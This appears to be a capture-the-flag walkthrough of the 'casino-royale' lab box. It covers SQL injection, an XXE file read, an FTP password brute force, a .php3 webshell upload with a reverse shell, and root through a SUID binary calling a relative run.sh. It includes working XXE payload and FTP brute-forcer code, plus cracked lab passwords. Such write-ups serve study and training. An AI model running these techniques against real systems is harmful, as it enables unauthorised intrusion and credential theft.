Use nmap to do port scanning.

HTTP ports: 80 and 8081. Check port 80 first.

Nothing special, so use dirb to look for sensitive files and directories.

Walked around and quickly found a SQL injection here:

Save the HTTP request as header.txt and run it through sqlmap.

Walked around the MySQL databases and found some useful information:

MySQL current user: valenka@localhost

MySQL user: phpmyadmin, hash: *D4020D9182CC52B86DC49251A1B6DA9AD7023B98 (cracks to controls\$)

database: pokerleague:

database: vip:

table: sfc_user_accounts (the salt is also MD5-length, so there is no hope of cracking these with online lookup services)

OK, this is an obvious XXE, which lets me read arbitrary files on the server (as far as the web server's privileges allow).
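The vulnerable form itself is in the screenshot above and is not reproduced here. As an added example (my code, not the writeup's or the box's), the block below shows the shape of a file-reading XXE payload and demonstrates it locally against Python's xml.sax parser, which only expands external general entities when feature_external_ges is switched on (it is off by default since Python 3.7.1). The file being read is a constructed stand-in for /etc/passwd written to a temp file; the element name `data` is an assumption, since the page does not show the real request.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def xxe_payload(path):
    """Classic XXE: an external general entity pointing at a local file.
    The parser replaces &xxe; with the file's contents, which the application
    then echoes back wherever it renders <data>. (Element name is assumed.)"""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file://%s"> ]>\n'
        '<data>&xxe;</data>' % path
    ).encode()


def parse(xml_bytes, resolve_external):
    """Parse with external general entity resolution on (vulnerable) or off (hardened)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo():
    """Writes a constructed stand-in for /etc/passwd, then parses the payload
    with both parser configurations. Returns (leaked_text, hardened_text)."""
    fd, path = tempfile.mkstemp(prefix="fake_passwd_")
    with os.fdopen(fd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line
    try:
        payload = xxe_payload(path)
        leaked = parse(payload, resolve_external=True)    # file contents come back
        hardened = parse(payload, resolve_external=False)  # entity silently skipped
    finally:
        os.unlink(path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
```

On the real target the payload goes into whatever XML the endpoint accepts, and the expanded entity comes back wherever the application echoes that element; the hardened parse is the same code with the feature left off, which is why it returns nothing.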

Four users with /bin/bash as their shell:

root, le, valenka, ftpUserULTRA

And from the hint above, “also pls update the password for the custom ftp acct once the front end is finished..since it’s easy”, I guess I need to brute-force the FTP password for the username ftpUserULTRA.

Tried brute-forcing with the top 100,000 passwords and finally got the correct one: bankbank
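As an added example (my code, not the author's tooling), here is a minimal FTP brute-forcer built on ftplib. The authenticator is passed in as a callable so that demo_offline() can exercise the loop against a constructed four-entry list and a fake server without any network. The host, the wordlist path and the fake server are assumptions for illustration; the username and the password it finds are the ones from the writeup.

```python
import ftplib
from functools import partial


def ftp_login_attempt(host, user, password, port=21, timeout=5):
    """Real authenticator: True if the FTP server accepts user/password.
    A 530 reply (ftplib.error_perm) is the normal "Login incorrect" answer;
    network errors propagate so the caller can back off or retry."""
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        ftp.login(user, password)
        return True
    except ftplib.error_perm:
        return False
    finally:
        ftp.close()  # safe even if connect() never succeeded


def read_wordlist(path, limit=None):
    """Yields passwords from a one-per-line list (rockyou-style), at most `limit` lines."""
    with open(path, encoding="latin-1") as f:
        for n, line in enumerate(f):
            if limit is not None and n >= limit:
                break
            pw = line.rstrip("\r\n")
            if pw:
                yield pw


def brute_force(user, candidates, attempt):
    """Tries each candidate with attempt(user, password), one fresh connection per try.
    Returns (password, tries) on the first success, or (None, tries) if exhausted."""
    tries = 0
    for password in candidates:
        tries += 1
        if attempt(user, password):
            return password, tries
    return None, tries


def demo_offline():
    """Runs the loop against a constructed candidate list and a fake server
    that only accepts the password found on the box."""
    candidates = ["123456", "password", "bankbank", "qwerty"]  # constructed list
    fake_server = lambda user, password: (user, password) == ("ftpUserULTRA", "bankbank")
    return brute_force("ftpUserULTRA", candidates, fake_server)


if __name__ == "__main__":
    import sys
    # Assumed invocation: python3 ftpbrute.py <host> <wordlist>
    host, wordlist = sys.argv[1], sys.argv[2]
    found, tries = brute_force("ftpUserULTRA",
                               read_wordlist(wordlist, limit=100000),
                               partial(ftp_login_attempt, host))
    print(f"{found!r} after {tries} attempts")
```

Most FTP daemons delay or disconnect after a few failed logins on one connection, so a new connection per attempt, as here, is the safer pattern; `hydra -l ftpUserULTRA -P <wordlist> ftp://<host>` does the same job faster.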

But port 22 is not open, so I cannot connect to sshd. I guess I have to log in over FTP and upload a webshell to gain a shell.

Tried hard and harder: the FTP server does not let me upload a file with a .php extension, but it does allow a .php3 extension, and the web server still executes .php3 as PHP. So I uploaded a PHP webshell with a .php3 extension and got a reverse shell.

Looking for SUID files:

And found one interesting file:

/opt/casino-royale/mi6_detect_test

It seems mi6_detect_test extracts output from ps and netstat. Interestingly, if I execute mi6_detect_test from outside the /opt/casino-royale/ folder, it prints “/bin/bash: run.sh: No such file or directory”.

I guess mi6_detect_test invokes run.sh by a bare relative name when executed, so it picks up whatever run.sh is in the current folder. If I can modify run.sh, I get a root shell. But run.sh is only editable by le.
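As an added example (my code, not the writeup's), the block below reproduces the two steps in Python: find files with the setuid bit, as `find / -perm -4000` would, and scan their printable strings, as strings(1) would, for shell scripts invoked by a bare relative name. A relative name like run.sh in a SUID binary is resolved against the caller's current directory, which is exactly what the "No such file or directory" error above shows. demo() builds a throwaway directory with a constructed stand-in for mi6_detect_test (the name is borrowed from the box; the bytes are made up) so the audit runs without the VM.

```python
import os
import re
import shutil
import stat
import tempfile

# A *.sh name not preceded by '/', a word character, '.' or '-': a bare script
# name such as "run.sh" in "/bin/bash run.sh". "/opt/x/run.sh" does not match.
RELATIVE_SH = re.compile(rb"(?<![\w/.-])([\w.-]+\.sh)\b")


def printable_strings(data, min_len=4):
    """Same idea as strings(1): runs of printable ASCII at least min_len long."""
    return [m.group(0) for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def relative_script_refs(data):
    """Sorted list of relative *.sh names referenced anywhere in the binary's strings."""
    found = set()
    for s in printable_strings(data):
        for m in RELATIVE_SH.finditer(s):
            found.add(m.group(1).decode())
    return sorted(found)


def find_suid(root):
    """Walks root and returns regular files whose mode carries the setuid bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def audit(root):
    """Returns {suid_path: [relative script names]} for every SUID file under root."""
    report = {}
    for path in find_suid(root):
        try:
            with open(path, "rb") as f:
                data = f.read()
        except OSError:  # not readable by us; still worth knowing it exists
            report[path] = []
            continue
        report[path] = relative_script_refs(data)
    return report


def demo():
    """Constructed tree: a SUID 'binary' that shells out to a relative run.sh and
    another SUID file that uses an absolute path. Returns the report keyed by
    path relative to the temp root."""
    root = tempfile.mkdtemp(prefix="suid_audit_")
    try:
        bad = os.path.join(root, "mi6_detect_test")  # name from the box, bytes constructed
        good = os.path.join(root, "helper")           # assumed name
        with open(bad, "wb") as f:
            f.write(b"\x7fELF\x00\x00ps aux\x00netstat -antp\x00/bin/bash run.sh\x00")
        with open(good, "wb") as f:
            f.write(b"\x7fELF\x00/bin/bash /opt/casino-royale/run.sh\x00")
        os.chmod(bad, 0o4755)
        os.chmod(good, 0o4755)  # SUID too, but absolute path: should come back clean
        return {os.path.relpath(p, root): refs for p, refs in audit(root).items()}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, refs in demo().items():
        print(path, "->", refs or "no relative script references")
```

Run audit('/') as the low-privilege user to get the same report for a whole box. A string match is only a lead: confirm it the way the writeup does, by running the binary from another directory and watching the error, since tracing a setuid binary with strace as a non-root user runs it without the elevated privileges.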

Take a closer look:

This is essentially the document root of the HTTP server on port 8081:

So the logic is:

le is running the HTTP server on port 8081, as we can see from the output of mi6_detect_test.

So when we click “Run Data Collect”, the server (running as le) executes collect.php, which invokes casino-data-collection.py and then prints its output.

Notice that casino-data-collection.py is owned by le, but its group is www-data (and it is group-writable), which means I can modify it from the webshell, which runs as www-data!

OK, the path is quite clear: modify casino-data-collection.py to get a shell as le, edit run.sh to launch /bin/bash, then run mi6_detect_test. Since mi6_detect_test is SUID, it runs run.sh as root, and run.sh in turn launches /bin/bash as root, which gives me a root shell.

I modified casino-data-collection.py as below:

Then clicked “Run Data Collect” in the browser and successfully got a reverse shell as le.

Then I appended one more line to the end of run.sh.

Then I executed mi6_detect_test and got a root shell.

PS: This is a very good challenge.